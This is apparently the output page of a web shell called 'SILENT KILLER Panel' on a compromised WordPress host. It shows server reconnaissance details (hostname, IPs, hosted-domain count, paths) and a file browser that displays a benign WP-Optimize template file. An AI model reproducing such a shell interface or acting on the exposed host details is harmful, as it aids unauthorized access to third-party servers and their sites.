SILENT KILLERPanel

Current Path: > home > transcarter > public_html > wp-content > > plugins > wp-optimize > > templates > images


Operation   : Linux host59.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Software     : Apache
Server IP    : 198.54.126.42 | Your IP: 216.73.216.135
Domains      : 1034 Domain(s)
Permission   : [ 0755 ]

Files and Folders in: /home/transcarter/public_html/wp-content//plugins/wp-optimize//templates/images

NameTypeSizeLast ModifiedActions
dimensions.php File 2265 bytes July 17 2025 21:05:49.
lazyload.php File 3020 bytes July 17 2025 21:05:49.
smush-details.php File 949 bytes July 17 2025 21:05:49.
smush-popup.php File 3737 bytes July 17 2025 21:05:49.
smush.php File 14224 bytes July 17 2025 21:05:49.
unused.php File 3307 bytes July 17 2025 21:05:49.

Reading File: /home/transcarter/public_html/wp-content//plugins/wp-optimize//templates/images/dimensions.php

<?php if (!defined('WPO_VERSION')) die('No direct access allowed'); ?>
<?php
$fcp_link = 'https://getwpo.com/first-contentful-paint/';
$cls_link = 'https://getwpo.com/cumulative-layout-shift/';
?>

<div class="wpo-fieldgroup wpo-first-child dimensions-options">
	<div class="wpo-images-dimensions__premium-mask">
		<a class="wpo-images-dimensions__premium-link" href="<?php echo esc_url($wp_optimize->premium_version_link); ?>" target="_blank"><?php esc_html_e('Auto add images dimensions with WP-Optimize Premium.', 'wp-optimize'); ?></a>
	</div>
	<p class="wpo-images-dimension-show-links"><?php
	// translators: %1$s - First Contentful Paint link, %2$s - Cumulative Layout Shift link (articles about core web vitals, FCP and CLS).
	printf(esc_html__('WP-Optimize will automatically detect images with missing width or height, and add those attributes for improving %1$s and %2$s.', 'wp-optimize'),
		// phpcs:disable
		// WordPress.Security.EscapeOutput.OutputNotEscaped - Output is already escaped
		$wp_optimize->wp_optimize_url($fcp_link, esc_html__('First Contentful Paint time', 'wp-optimize'), '', '', true),
		$wp_optimize->wp_optimize_url($cls_link, esc_html__('Cumulative Layout Shift', 'wp-optimize'), '', '', true));
		// phpcs:enable
	?></p>
	<div class="switch-container">
		<label class="switch">
			<input name="images_dimensions" id="images_dimensions" class="dimensions-settings" type="checkbox">
			<span class="slider round"></span>
		</label>
		<label for="images_dimensions">
			<?php esc_html_e('Enable images dimensions', 'wp-optimize'); ?>
		</label>
	</div>
	<div>
		<p><?php esc_html_e('Skip image CSS classes', 'wp-optimize'); ?></p>
		<input type="text" name="image_dimensions_ignore_classes" id="image_dimensions_ignore_classes" value="<?php echo esc_attr($ignore_classes); ?>">
		<p><small><?php
		esc_html_e('Enter the image class or classes comma-separated.', 'wp-optimize');
		echo ' ';
		esc_html_e('Supports wildcards.', 'wp-optimize');
		echo ' ';
		esc_html_e('Example: image-class1, image-class2, thumbnail*, ...', 'wp-optimize');
		?>
		</small></p>
		
	</div>
	<p>
		<small><?php esc_html_e("For advanced users: use `data-no-image-dimensions` in image tags to bypass this feature.", 'wp-optimize'); ?></small>
	</p>
</div>

SILENT KILLER Tool